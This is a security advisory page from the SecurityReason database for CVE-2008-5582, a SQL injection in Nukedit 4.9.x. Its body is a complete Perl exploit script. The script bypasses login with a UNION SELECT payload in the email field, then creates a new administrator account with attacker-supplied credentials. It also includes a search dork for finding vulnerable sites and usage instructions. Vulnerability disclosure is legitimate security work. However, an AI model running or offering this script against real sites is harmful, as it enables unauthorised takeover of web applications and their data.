|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 4732 CVE : CVE-2008-5582 CWE : CWE-89 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : Yes Credit : r3dm0v3 Published : 17.12.2008
Advisory Content : #!/usr/bin/perl ########################################################### #Title: Nukedit 4.9.x Create Admin Exploit # # # #Credit: r3dm0v3 # # http://r3dm0v3.persianblog.ir # # r3dm0v3[4t]yahoo[dot]com # # Tehran - Iran # # # #Download: http://www.nukedit.com/content/Download.asp # #Vulnerables: 4.9.x, prior versions maybe affected. # #Remote: Yes # #Dork: "Powered by Nukedit" # #Fix: Not Available # ########################################################### use LWP::UserAgent; use HTTP::Cookies; $host = $ARGV[0]; if (substr($host,length($host)-1,1) ne "/"){ $host.="/"; } $usrmail = $ARGV[1]; $passwd = $ARGV[2]; $url = "http://".$host; $usrSQL= "' union select 1,1,'r3dm0v3',4,'ENCfc2aef9fe5f2c546429e2e1d9fd737e6da5b1b94707518619576129 a915d0c2c',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from tblusers where 'x'='x"; &Banner(); if (@ARGV < 3) { &Usage(); exit(1); } print "[~] Host: $host \n"; print "[~] Email/Password: $usrmail/$passwd\n"; print "[~] Logging in...\n"; $xpl = LWP::UserAgent->new() || die; $cookie_jar = HTTP::Cookies->new(); $xpl->cookie_jar( $cookie_jar ); $res = $xpl->post($url.'utilities/login.asp', Content => [ "redir" => "/nukedit/default.asp", "email" => "$usrSQL", "password" => "r3dm0v3", "savepassword" => "false", "submit" => "Login", ],); if ($res->content =~ /Object Moved/){ print "[+] Logged in\n"; }else{ print "[-] Can not login!\n"; exit(); } print "[~] Creating Admin...\n"; $res = $xpl->post($url.'utilities/useradmin.asp', Content => [ "action" => "addDB", "username" => "r3dm0v3", "company" => "red move", "url" => "http://r3dm0v3.persianblog.ir", "address" => "a", "county" => "b", "zip" => "666", "country" => "Iran", "phone" => "66666666", "fax" => "12345678", "email" => "$usrmail", "password" => "$passwd", "groupid" => "1", "submit1" => "Add User >>", "IP" => "127.0.0.2", ],); if ($res->content =~ /Object Moved/){ print "[+] Admin added. Login info:\n". " email: $usrmail\n". " password: $passwd\n"; }else{ print "[-] Exploit failed!\n"; print $res->content; } sub Banner{ print "############################################################\n". "# Nukedit 4.9.x Create Admin Exploit #\n". "# by r3dm0v3 #\n". "# r3dm0v3[4t]yahoo[.]com #\n". "# http://r3dm0v3.persianblog.ir #\n". "############################################################\n"; } sub Usage(){ print "\n Usage: nukedit.pl <host&path> <email> <password>\n"; print " ex. : nukedit.pl site.com/nukedit/ myname\@somewhere.com 123456\n"; }  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |